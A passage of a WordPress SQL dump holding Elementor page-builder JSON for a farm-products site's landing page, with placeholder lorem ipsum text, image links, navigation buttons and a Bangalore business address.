the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"f4996be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6f2a1f5\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"24f8373\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3cd3a5c\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"dc5078a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0324abe\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8901,1532,'_elementor_page_assets','a:0:{}'),(8903,1527,'wpforms_form_locations','a:0:{}'),(8904,1533,'_elementor_edit_mode','builder'),(8905,1533,'_elementor_template_type','wp-page'),(8906,1533,'_elementor_version','3.7.8'),(8907,1533,'_wp_page_template','elementor_canvas'),(8908,1533,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"14a6bb1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"785d463\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#E1D7D74F\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5ccfaed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8e25cb7\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"f4996be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6f2a1f5\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"24f8373\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3cd3a5c\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"dc5078a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0324abe\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c08eed2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3845821\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d7c7592\",\"elType\":\"widget\",\"settings\":{\"form_id\":\"1527\"},\"elements\":[],\"widgetType\":\"wpforms\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8909,1533,'_elementor_page_assets','a:0:{}'),(8920,1373,'_oembed_d6cb57bc93e5f4958507bfd6c472adfa','{{unknown}}'),(8927,1535,'_elementor_edit_mode','builder'),(8928,1535,'_elementor_template_type','wp-page'),(8929,1535,'_elementor_version','3.7.8'),(8930,1535,'_wp_page_template','elementor_canvas'),(8931,1535,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"wid